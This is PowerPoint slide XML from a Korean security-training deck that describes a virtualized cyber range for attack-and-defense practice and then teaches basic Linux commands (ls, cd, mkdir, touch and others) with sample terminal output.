                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35C76A9-D8D1-4DD3-A102-53A1789FFA25}"/>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1" name="직선 화살표 연결선 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F38A4C-BE69-4E52-B701-DBEDE8C8C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39"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2923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단위과제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066084"/>
            <a:ext cx="10630230" cy="1325564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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가상화 환경으로 구축되어 운용</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 네트워크 환경과 유사하게 구성</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진행에 필요한 네트워크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서버 및 기타 장비</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정보보호체계 등</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가상화 기반으로 구현되어 있음</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6880E82-60CF-498B-9AE3-1AE274B2FB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370667" y="1690688"/>
            <a:ext cx="7450666" cy="3255023"/>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2575216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시나리오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30740"/>
            <a:ext cx="10630230" cy="96090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해당 환경에서 시나리오에 기반한 연속적인 침해행위들을 발생</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indent="0" algn="just" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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교육생들이 해당 침해행위들에 대한 대응과정</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실습과제</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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E4F6BF-6CAF-4148-A75E-D301FE116E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565071" y="1690688"/>
            <a:ext cx="7061858" cy="3599854"/>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229438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가상의 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자동화 도구를 활용하여 정보체계 취약점에 대한 실시간 공격과 방어과정을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공격</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방어 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3BBEB8-2000-4F7A-9D5C-B527DC3B225E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327854" y="1618163"/>
            <a:ext cx="7421659" cy="3809879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="화살표: 오른쪽 10">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDE8BAB-00B2-4BDA-B805-8EEE028E48D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455328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체계 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46BA5A1-DA53-4E65-BA89-47F367E48A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337960" y="1690688"/>
            <a:ext cx="4577435" cy="4971502"/>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DBB36A63-067F-479E-92E8-85DE509813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2235CCB7-FDC2-47A7-BACD-2293F2EA35B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7125413" y="1690688"/>
            <a:ext cx="3728627" cy="4971502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10520969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기본 명령어</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1512755652"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4677792"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="388289">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>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gridCol w="429371">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="699377342"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1121134">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="438747241"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="290355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번호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pwd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디렉토리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>경로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 출력</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grep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경로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echo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ls</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목록 확인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sort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mkdir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생성</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sudo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touch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날짜정보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chown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출력</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여러 개의 파일 합치기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man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파일이나 디렉토리를 삭제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mv</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ifconfig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디렉토리를 복사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매뉴얼 출력</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head</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/tail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파일을 보고싶은 줄 수만큼 보여준다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find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특정 파일이나 디렉토리를 검색한다</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init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ps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실행중인 프로세스 목록</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kill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프로세스 강제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shutdown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batch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배치파일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미리 정의된 시스템 명령어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wget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14"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247371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pwd</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현재 디렉토리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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50097"/>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767439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cd : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로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/var/log</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/var/log</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/root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C5258CC-2BE3-46CC-BCB2-A949506089B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892027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ls : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>디렉토리 목록 확인</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home]# cd /export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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>log  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>_url.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>txt  home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4096 10</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>29  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>2017 home</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 5 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>4 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>20:17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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>..  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>log  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>_url.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>txt  home  repo</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-al</a:t>
              </a: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4 20:17 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 25 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>22 14:37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4" y="1690688"/>
            <a:ext cx="5109379" cy="4940700"/>
            <a:chOff x="1196833" y="1885839"/>
            <a:chExt cx="3919995"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3" y="1885839"/>
              <a:ext cx="3919993" cy="22350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–S  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>파일 크기 순으로 정렬하여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알파벳 거꾸로 순으로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하위 디렉토리 까지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–h  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: K(kilo), M</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(mega</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>), G(giga) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>단위를 사용하여 파일 크기를 사람이 보기 좋게 표시한다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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>lu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>atime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>접근 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>read.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>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–lc  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ctime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>변경 시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>을 출력한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.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al e*.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>g  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ‘e'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 시작하고 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>‘.g'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 끝나는 디렉토리 내용을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&gt; file.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>txt  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1"/>
                <a:t>리다이렉션</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t> 연산자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(&gt;, &gt;&gt;)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 사용하여 디렉토리 내용을 파일에 저장할 수 있다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2CD636-3646-4709-9F8D-1A6060A9790F}"/>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696300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mkdir</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디렉토리 생성</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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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775 test3</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777 test4</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solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-x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solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>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CDDDC852-3F93-4089-99C8-56E15F68227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593065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touch : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및 날짜정보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a:t>/test1/test2</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touch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touch -t </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>202106141200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oldfile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touch -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>r oldfile newfile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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE64E494-9CFA-4405-A3E5-25472588097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94562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A3623B0D-630D-4C0C-99C3-D619003E7D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604134" y="2036618"/>
            <a:ext cx="5222694" cy="3877294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE81B3C-0693-4544-9264-957EFF2B86E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705100" y="4304806"/>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36FD7FA-0972-477C-B597-72D6C45B67CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534862" y="6028764"/>
            <a:ext cx="5444836" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://kitribob.wiki/wiki/%EB%B0%B1%EB%8F%84%EC%9A%B0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="제2기 차세대 보안리더 양성 프로그램(Best of the Best)... - 한국정보기술연구원 'Best of the Best'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EF3FB9-C729-4B6A-8333-0956DFF539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65" y="2945493"/>
            <a:ext cx="1482082" cy="1385947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
